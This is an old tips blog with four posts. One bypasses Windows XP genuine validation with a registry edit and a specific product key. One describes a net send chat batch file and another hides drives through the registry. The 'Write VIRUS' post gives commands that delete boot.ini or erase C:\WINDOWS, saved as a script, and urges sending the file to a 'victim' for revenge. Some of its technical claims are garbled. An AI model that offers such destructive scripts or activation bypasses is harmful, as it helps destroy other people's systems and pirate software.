Tuesday, October 20, 2009

Make your Windows Xp GENUINE

Make your Windows Xp GENUINE.!!
This will allow you to bypass the Microsoft Genuine Validation thingy .
1) Start > run > "regedit" (without the quotes of course)

2) Go to the key:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer...and double click on it.Then change some of the value data to ANYTHING ELSE...delete some, add some letters. Close out regedit.

3) Go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

4) The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.Now you can do all the updates without activating, and the Genuine Microsoft Validation thing!!

Works with most WinXP versions though there are some exceptions...

Monday, October 19, 2009

Write VIRUS to computer in 5 minutes

Creating virus trick
(I)
1.Open ur notepad
2.Type del c:\boot.ini c:\del autoexec.bat save as filename.exe[save it asfilename.exe you can give any filename ]
3.create the notepad in c: drive...
(II)
Note: But with in seconds harddisk get damaged
Create Virus in 5 minutes.......Very easy but dangerous Virus
The only thing you need is Notepad.Now, to test it, create a textfile called TEST.txt(empty)in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).Then do "Save As..." and save it as "Test.cmd".Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.Now, the real work begins:Go to Notpad andtype erase C:\WINDOWS (or C:\LINUX if you have linux) andsave it again as findoutaname.cmd.Now DON'T run the file or you'll lose your WINDOWS map.So, that's the virus. Now to take revenge.Send you file to your victim.Once she/he opens it. Her/his WINDOWS/LINUX map is gone.And have to install LINUX/WINDOWS again.Simple explanation: Go to notepad, type erase C:\WINDOWS, save,send to victim, once the victim opens it,the map WINDOWS will be gone and have to install WINDOWS again...

I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN TO YOUR COMPUTER IF YOU TRY THIS!!!!!!!Be aware of this:-its a simple but a strong virus that can delete anyone’s window operating system through email
“i am not at all responsible for any of the further cause”.

Friday, October 16, 2009

Chat With Command Prompt

If you want personal chat with a friend you don't need to download any yahoo messengerAll you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt
you should see:
MESSENGER User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!

Thursday, October 15, 2009

How to Hide the drives(c:,d:,e:,...etc) in your Computer

To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNow in the right pane create a new DWORD item and name it NoDrives (it is case sensitive).Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
2.Restart your computer.
So, now when you click on My Computer, no drives will be shown.

To enable display of drives in My Computer, simply delete this DWORD item that you created.
Again restart your computer.
You can now see all the drives again.